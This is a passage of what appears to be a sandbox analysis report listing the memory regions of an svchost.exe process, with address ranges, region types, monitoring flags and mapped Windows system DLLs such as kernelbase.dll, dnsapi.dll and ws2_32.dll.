filename = ""
Region:
id = 1663
start_va = 0x20000
end_va = 0x21fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 1664
start_va = 0x30000
end_va = 0x44fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 1665
start_va = 0x50000
end_va = 0xcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 1666
start_va = 0xd0000
end_va = 0xd3fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000d0000"
filename = ""
Region:
id = 1667
start_va = 0xe0000
end_va = 0xe0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000e0000"
filename = ""
Region:
id = 1668
start_va = 0xf0000
end_va = 0xf1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 1669
start_va = 0x100000
end_va = 0x17ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000100000"
filename = ""
Region:
id = 1670
start_va = 0x180000
end_va = 0x186fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000180000"
filename = ""
Region:
id = 1671
start_va = 0x190000
end_va = 0x190fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000190000"
filename = ""
Region:
id = 1672
start_va = 0x1a0000
end_va = 0x1a0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001a0000"
filename = ""
Region:
id = 1673
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001b0000"
filename = ""
Region:
id = 1674
start_va = 0x1c0000
end_va = 0x1dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 1675
start_va = 0x1e0000
end_va = 0x1fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001e0000"
filename = ""
Region:
id = 1676
start_va = 0x200000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 1677
start_va = 0x400000
end_va = 0x4fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 1678
start_va = 0x500000
end_va = 0x5bdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1679
start_va = 0x5c0000
end_va = 0x67ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000005c0000"
filename = ""
Region:
id = 1680
start_va = 0x680000
end_va = 0x6e3fff
monitored = 0
entry_point = 0x695ae0
region_type = mapped_file
name = "wevtapi.dll"
filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll")
Region:
id = 1681
start_va = 0x6f0000
end_va = 0x6f6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000006f0000"
filename = ""
Region:
id = 1682
start_va = 0x700000
end_va = 0x7fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000700000"
filename = ""
Region:
id = 1683
start_va = 0x800000
end_va = 0x987fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000800000"
filename = ""
Region:
id = 1684
start_va = 0x990000
end_va = 0xb10fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000990000"
filename = ""
Region:
id = 1685
start_va = 0xb20000
end_va = 0xf1afff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000b20000"
filename = ""
Region:
id = 1686
start_va = 0xf20000
end_va = 0xf9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000f20000"
filename = ""
Region:
id = 1687
start_va = 0xfa0000
end_va = 0x101ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000fa0000"
filename = ""
Region:
id = 1688
start_va = 0x1020000
end_va = 0x103ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001020000"
filename = ""
Region:
id = 1689
start_va = 0x1040000
end_va = 0x1040fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001040000"
filename = ""
Region:
id = 1690
start_va = 0x1050000
end_va = 0x1050fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001050000"
filename = ""
Region:
id = 1691
start_va = 0x1060000
end_va = 0x1066fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001060000"
filename = ""
Region:
id = 1692
start_va = 0x1070000
end_va = 0x10effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001070000"
filename = ""
Region:
id = 1693
start_va = 0x10f0000
end_va = 0x10f0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000010f0000"
filename = ""
Region:
id = 1694
start_va = 0x1100000
end_va = 0x11fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001100000"
filename = ""
Region:
id = 1695
start_va = 0x1300000
end_va = 0x1300fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001300000"
filename = ""
Region:
id = 1696
start_va = 0x1310000
end_va = 0x1310fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001310000"
filename = ""
Region:
id = 1697
start_va = 0x1380000
end_va = 0x13fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001380000"
filename = ""
Region:
id = 1698
start_va = 0x1400000
end_va = 0x147ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001400000"
filename = ""
Region:
id = 1699
start_va = 0x1480000
end_va = 0x1480fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001480000"
filename = ""
Region:
id = 1700
start_va = 0x1490000
end_va = 0x1490fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001490000"
filename = ""
Region:
id = 1701
start_va = 0x14f0000
end_va = 0x14f6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000014f0000"
filename = ""
Region:
id = 1702
start_va = 0x1500000
end_va = 0x15fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001500000"
filename = ""
Region:
id = 1703
start_va = 0x1600000
end_va = 0x16fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001600000"
filename = ""
Region:
id = 1704
start_va = 0x1700000
end_va = 0x177ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001700000"
filename = ""
Region:
id = 1705
start_va = 0x1780000
end_va = 0x17fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001780000"
filename = ""
Region:
id = 1706
start_va = 0x1800000
end_va = 0x18fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001800000"
filename = ""
Region:
id = 1707
start_va = 0x1900000
end_va = 0x19fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001900000"
filename = ""
Region:
id = 1708
start_va = 0x1a00000
end_va = 0x1a7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001a00000"
filename = ""
Region:
id = 1709
start_va = 0x1a90000
end_va = 0x1b8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001a90000"
filename = ""
Region:
id = 1710
start_va = 0x1c00000
end_va = 0x1cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001c00000"
filename = ""
Region:
id = 1711
start_va = 0x1d00000
end_va = 0x1dfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001d00000"
filename = ""
Region:
id = 1712
start_va = 0x1e00000
end_va = 0x1efffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001e00000"
filename = ""
Region:
id = 1713
start_va = 0x2100000
end_va = 0x21fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002100000"
filename = ""
Region:
id = 1714
start_va = 0x2200000
end_va = 0x22dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Region:
id = 1715
start_va = 0x2300000
end_va = 0x23fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002300000"
filename = ""
Region:
id = 1716
start_va = 0x2400000
end_va = 0x2736fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1717
start_va = 0x2740000
end_va = 0x283ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002740000"
filename = ""
Region:
id = 1718
start_va = 0x2840000
end_va = 0x293ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002840000"
filename = ""
Region:
id = 1719
start_va = 0x2940000
end_va = 0x2a3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002940000"
filename = ""
Region:
id = 1720
start_va = 0x2b00000
end_va = 0x2bfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002b00000"
filename = ""
Region:
id = 1721
start_va = 0x2c00000
end_va = 0x2cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002c00000"
filename = ""
Region:
id = 1722
start_va = 0x2d00000
end_va = 0x2dfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002d00000"
filename = ""
Region:
id = 1723
start_va = 0x2e00000
end_va = 0x2efffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002e00000"
filename = ""
Region:
id = 1724
start_va = 0x2f00000
end_va = 0x2ffffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002f00000"
filename = ""
Region:
id = 1725
start_va = 0x3000000
end_va = 0x30fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003000000"
filename = ""
Region:
id = 1726
start_va = 0x3200000
end_va = 0x32fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003200000"
filename = ""
Region:
id = 1727
start_va = 0x3300000
end_va = 0x33fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003300000"
filename = ""
Region:
id = 1728
start_va = 0x3400000
end_va = 0x34fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003400000"
filename = ""
Region:
id = 1729
start_va = 0x3500000
end_va = 0x35fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003500000"
filename = ""
Region:
id = 1730
start_va = 0x3600000
end_va = 0x36fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003600000"
filename = ""
Region:
id = 1731
start_va = 0x3700000
end_va = 0x37fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003700000"
filename = ""
Region:
id = 1732
start_va = 0x3800000
end_va = 0x38fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003800000"
filename = ""
Region:
id = 1733
start_va = 0x3900000
end_va = 0x39fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003900000"
filename = ""
Region:
id = 1734
start_va = 0x3a00000
end_va = 0x3afffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003a00000"
filename = ""
Region:
id = 1735
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1736
start_va = 0x7df5ffec0000
end_va = 0x7df5fffbffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffec0000"
filename = ""
Region:
id = 1737
start_va = 0x7df5fffc0000
end_va = 0x7df5fffe2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5fffc0000"
filename = ""
Region:
id = 1738
start_va = 0x7df5ffff0000
end_va = 0x7ff5fffeffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffff0000"
filename = ""
Region:
id = 1739
start_va = 0x7ff60e670000
end_va = 0x7ff60e67cfff
monitored = 0
entry_point = 0x7ff60e673980
region_type = mapped_file
name = "svchost.exe"
filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")
Region:
id = 1740
start_va = 0x7ffc45b70000
end_va = 0x7ffc45d27fff
monitored = 0
entry_point = 0x7ffc45b75550
region_type = mapped_file
name = "wmalfxgfxdsp.dll"
filename = "\\Windows\\System32\\WMALFXGFXDSP.dll" (normalized: "c:\\windows\\system32\\wmalfxgfxdsp.dll")
Region:
id = 1741
start_va = 0x7ffc4c370000
end_va = 0x7ffc4c383fff
monitored = 0
entry_point = 0x7ffc4c371800
region_type = mapped_file
name = "wbemsvc.dll"
filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")
Region:
id = 1742
start_va = 0x7ffc4c390000
end_va = 0x7ffc4c485fff
monitored = 0
entry_point = 0x7ffc4c3c9590
region_type = mapped_file
name = "fastprox.dll"
filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")
Region:
id = 1743
start_va = 0x7ffc4dbb0000
end_va = 0x7ffc4dbc0fff
monitored = 0
entry_point = 0x7ffc4dbb2fc0
region_type = mapped_file
name = "wbemprox.dll"
filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")
Region:
id = 1744
start_va = 0x7ffc4ee90000
end_va = 0x7ffc4ef0efff
monitored = 0
entry_point = 0x7ffc4eea7110
region_type = mapped_file
name = "wbemcomn.dll"
filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll")
Region:
id = 1745
start_va = 0x7ffc53440000
end_va = 0x7ffc5346afff
monitored = 0
entry_point = 0x7ffc5344c3c0
region_type = mapped_file
name = "rtworkq.dll"
filename = "\\Windows\\System32\\RTWorkQ.dll" (normalized: "c:\\windows\\system32\\rtworkq.dll")
Region:
id = 1746
start_va = 0x7ffc53470000
end_va = 0x7ffc5357cfff
monitored = 0
entry_point = 0x7ffc5349f420
region_type = mapped_file
name = "mfplat.dll"
filename = "\\Windows\\System32\\mfplat.dll" (normalized: "c:\\windows\\system32\\mfplat.dll")
Region:
id = 1747
start_va = 0x7ffc546f0000
end_va = 0x7ffc54722fff
monitored = 0
entry_point = 0x7ffc546fae20
region_type = mapped_file
name = "wscsvc.dll"
filename = "\\Windows\\System32\\wscsvc.dll" (normalized: "c:\\windows\\system32\\wscsvc.dll")
Region:
id = 1748
start_va = 0x7ffc54990000
end_va = 0x7ffc5499dfff
monitored = 0
entry_point = 0x7ffc54992e50
region_type = mapped_file
name = "cmintegrator.dll"
filename = "\\Windows\\System32\\cmintegrator.dll" (normalized: "c:\\windows\\system32\\cmintegrator.dll")
Region:
id = 1749
start_va = 0x7ffc549a0000
end_va = 0x7ffc549d7fff
monitored = 0
entry_point = 0x7ffc549a68f0
region_type = mapped_file
name = "wcmcsp.dll"
filename = "\\Windows\\System32\\wcmcsp.dll" (normalized: "c:\\windows\\system32\\wcmcsp.dll")
Region:
id = 1750
start_va = 0x7ffc54a10000
end_va = 0x7ffc54aa8fff
monitored = 0
entry_point = 0x7ffc54a2a090
region_type = mapped_file
name = "wcmsvc.dll"
filename = "\\Windows\\System32\\wcmsvc.dll" (normalized: "c:\\windows\\system32\\wcmsvc.dll")
Region:
id = 1751
start_va = 0x7ffc54b20000
end_va = 0x7ffc54b39fff
monitored = 0
entry_point = 0x7ffc54b22430
region_type = mapped_file
name = "dhcpcsvc.dll"
filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll")
Region:
id = 1752
start_va = 0x7ffc54ff0000
end_va = 0x7ffc55077fff
monitored = 0
entry_point = 0x7ffc55004510
region_type = mapped_file
name = "audioses.dll"
filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll")
Region:
id = 1753
start_va = 0x7ffc55080000
end_va = 0x7ffc5518afff
monitored = 0
entry_point = 0x7ffc550c2610
region_type = mapped_file
name = "audiosrv.dll"
filename = "\\Windows\\System32\\audiosrv.dll" (normalized: "c:\\windows\\system32\\audiosrv.dll")
Region:
id = 1754
start_va = 0x7ffc55190000
end_va = 0x7ffc551a5fff
monitored = 0
entry_point = 0x7ffc551919f0
region_type = mapped_file
name = "dhcpcsvc6.dll"
filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll")
Region:
id = 1755
start_va = 0x7ffc552a0000
end_va = 0x7ffc5530ffff
monitored = 0
entry_point = 0x7ffc552c2960
region_type = mapped_file
name = "mmdevapi.dll"
filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll")
Region:
id = 1756
start_va = 0x7ffc55820000
end_va = 0x7ffc55857fff
monitored = 0
entry_point = 0x7ffc55838cc0
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 1757
start_va = 0x7ffc55860000
end_va = 0x7ffc5586afff
monitored = 0
entry_point = 0x7ffc55861d30
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 1758
start_va = 0x7ffc55870000
end_va = 0x7ffc558b7fff
monitored = 0
entry_point = 0x7ffc5587a1e0
region_type = mapped_file
name = "dhcpcore6.dll"
filename = "\\Windows\\System32\\dhcpcore6.dll" (normalized: "c:\\windows\\system32\\dhcpcore6.dll")
Region:
id = 1759
start_va = 0x7ffc57510000
end_va = 0x7ffc5756cfff
monitored = 0
entry_point = 0x7ffc57522bf0
region_type = mapped_file
name = "dhcpcore.dll"
filename = "\\Windows\\System32\\dhcpcore.dll" (normalized: "c:\\windows\\system32\\dhcpcore.dll")
Region:
id = 1760
start_va = 0x7ffc576e0000
end_va = 0x7ffc57890fff
monitored = 0
entry_point = 0x7ffc57733690
region_type = mapped_file
name = "wevtsvc.dll"
filename = "\\Windows\\System32\\wevtsvc.dll" (normalized: "c:\\windows\\system32\\wevtsvc.dll")
Region:
id = 1761
start_va = 0x7ffc57bb0000
end_va = 0x7ffc57ce5fff
monitored = 0
entry_point = 0x7ffc57bdf350
region_type = mapped_file
name = "wintypes.dll"
filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll")
Region:
id = 1762
start_va = 0x7ffc57e70000
end_va = 0x7ffc57f37fff
monitored = 0
entry_point = 0x7ffc57eb13f0
region_type = mapped_file
name = "winhttp.dll"
filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll")
Region:
id = 1763
start_va = 0x7ffc581a0000
end_va = 0x7ffc581e9fff
monitored = 0
entry_point = 0x7ffc581aac30
region_type = mapped_file
name = "deviceaccess.dll"
filename = "\\Windows\\System32\\deviceaccess.dll" (normalized: "c:\\windows\\system32\\deviceaccess.dll")
Region:
id = 1764
start_va = 0x7ffc58d40000
end_va = 0x7ffc58d50fff
monitored = 0
entry_point = 0x7ffc58d43320
region_type = mapped_file
name = "wmiclnt.dll"
filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll")
Region:
id = 1765
start_va = 0x7ffc58fa0000
end_va = 0x7ffc58fa8fff
monitored = 0
entry_point = 0x7ffc58fa19a0
region_type = mapped_file
name = "nrpsrv.dll"
filename = "\\Windows\\System32\\nrpsrv.dll" (normalized: "c:\\windows\\system32\\nrpsrv.dll")
Region:
id = 1766
start_va = 0x7ffc58fb0000
end_va = 0x7ffc58fbafff
monitored = 0
entry_point = 0x7ffc58fb1cd0
region_type = mapped_file
name = "lmhsvc.dll"
filename = "\\Windows\\System32\\lmhsvc.dll" (normalized: "c:\\windows\\system32\\lmhsvc.dll")
Region:
id = 1767
start_va = 0x7ffc58fd0000
end_va = 0x7ffc58fe7fff
monitored = 0
entry_point = 0x7ffc58fd5910
region_type = mapped_file
name = "nlaapi.dll"
filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")
Region:
id = 1768
start_va = 0x7ffc5a2c0000
end_va = 0x7ffc5a2d2fff
monitored = 0
entry_point = 0x7ffc5a2c2760
region_type = mapped_file
name = "wtsapi32.dll"
filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")
Region:
id = 1769
start_va = 0x7ffc5a3a0000
end_va = 0x7ffc5a525fff
monitored = 0
entry_point = 0x7ffc5a3ed700
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")
Region:
id = 1770
start_va = 0x7ffc5a850000
end_va = 0x7ffc5a876fff
monitored = 0
entry_point = 0x7ffc5a857940
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 1771
start_va = 0x7ffc5a8a0000
end_va = 0x7ffc5a949fff
monitored = 0
entry_point = 0x7ffc5a8c7910
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 1772
start_va = 0x7ffc5abb0000
end_va = 0x7ffc5abe1fff
monitored = 0
entry_point = 0x7ffc5abc2340
region_type = mapped_file
name = "fwbase.dll"
filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll")
Region:
id = 1773
start_va = 0x7ffc5ae30000
end_va = 0x7ffc5ae53fff
monitored = 0
entry_point = 0x7ffc5ae33260
region_type = mapped_file
name = "gpapi.dll"
filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")
Region:
id = 1774
start_va = 0x7ffc5afd0000
end_va = 0x7ffc5b0c3fff
monitored = 0
entry_point = 0x7ffc5afda960
region_type = mapped_file
name = "ucrtbase.dll"
filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll")
Region:
id = 1775
start_va = 0x7ffc5b240000
end_va = 0x7ffc5b24bfff
monitored = 0
entry_point = 0x7ffc5b2427e0
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 1776
start_va = 0x7ffc5b320000
end_va = 0x7ffc5b350fff
monitored = 0
entry_point = 0x7ffc5b327d10
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 1777
start_va = 0x7ffc5b590000
end_va = 0x7ffc5b5aefff
monitored = 0
entry_point = 0x7ffc5b595d30
region_type = mapped_file
name = "userenv.dll"
filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll")
Region:
id = 1778
start_va = 0x7ffc5b700000
end_va = 0x7ffc5b75bfff
monitored = 0
entry_point = 0x7ffc5b716f70
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")
Region:
id = 1779
start_va = 0x7ffc5b8d0000
end_va = 0x7ffc5b8dafff
monitored = 0
entry_point = 0x7ffc5b8d19a0
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 1780
start_va = 0x7ffc5bab0000
end_va = 0x7ffc5badcfff
monitored = 0
entry_point = 0x7ffc5bac9d40
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 1781
start_va = 0x7ffc5bc40000
end_va = 0x7ffc5bc95fff
monitored = 0
entry_point = 0x7ffc5bc50bf0
region_type = mapped_file
name = "winsta.dll"
filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")
Region:
id = 1782
start_va = 0x7ffc5bcc0000
end_va = 0x7ffc5bce8fff
monitored = 0
entry_point = 0x7ffc5bcd4530
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 1783
start_va = 0x7ffc5be30000
end_va = 0x7ffc5be43fff
monitored = 0
entry_point = 0x7ffc5be352e0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 1784
start_va = 0x7ffc5be50000
end_va = 0x7ffc5be5efff
monitored = 0
entry_point = 0x7ffc5be53210
region_type = mapped_file
name = "kernel.appcore.dll"
filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")
Region:
id = 1785
start_va = 0x7ffc5be60000
end_va = 0x7ffc5be6ffff
monitored = 0
entry_point = 0x7ffc5be656e0
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 1786
start_va = 0x7ffc5be70000
end_va = 0x7ffc5bebafff
monitored = 0
entry_point = 0x7ffc5be735f0
region_type = mapped_file
name = "powrprof.dll"
filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")
Region:
id = 1787
start_va = 0x7ffc5bec0000
end_va = 0x7ffc5bf02fff
monitored = 0
entry_point = 0x7ffc5bed4b50
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 1788
start_va = 0x7ffc5bf10000
end_va = 0x7ffc5bf95fff
monitored = 0
entry_point = 0x7ffc5bf1d8f0
region_type = mapped_file
name = "firewallapi.dll"
filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll")
Region:
id = 1789
start_va = 0x7ffc5bfa0000
end_va = 0x7ffc5c187fff
monitored = 0
entry_point = 0x7ffc5bfcba70
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1790
start_va = 0x7ffc5c190000
end_va = 0x7ffc5c356fff
monitored = 0
entry_point = 0x7ffc5c1edb80
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 1791
start_va = 0x7ffc5cac0000
end_va = 0x7ffc5cb29fff
monitored = 0
entry_point = 0x7ffc5caf6d50
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")
Region:
id = 1792
start_va = 0x7ffc5e1e0000
end_va = 0x7ffc5e2a0fff
monitored = 0
entry_point = 0x7ffc5e200da0
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 1793
start_va = 0x7ffc5e2b0000
end_va = 0x7ffc5e3cbfff
monitored = 0
entry_point = 0x7ffc5e2f02b0
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 1794
start_va = 0x7ffc5e3e0000
end_va = 0x7ffc5e522fff
monitored = 0
entry_point = 0x7ffc5e408210
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 1795
start_va = 0x7ffc5e740000
end_va = 0x7ffc5e7aafff
monitored = 0
entry_point = 0x7ffc5e7590c0
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 1796
start_va = 0x7ffc5e850000
end_va = 0x7ffc5e8ecfff
monitored = 0
entry_point = 0x7ffc5e8578a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 1797
start_va = 0x7ffc5e8f0000
end_va = 0x7ffc5e94afff
monitored = 0
entry_point = 0x7ffc5e9038b0
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 1798
start_va = 0x7ffc5e950000
end_va = 0x7ffc5e957fff
monitored = 0
entry_point = 0x7ffc5e951ea0
region_type = mapped_file
name = "nsi.dll"
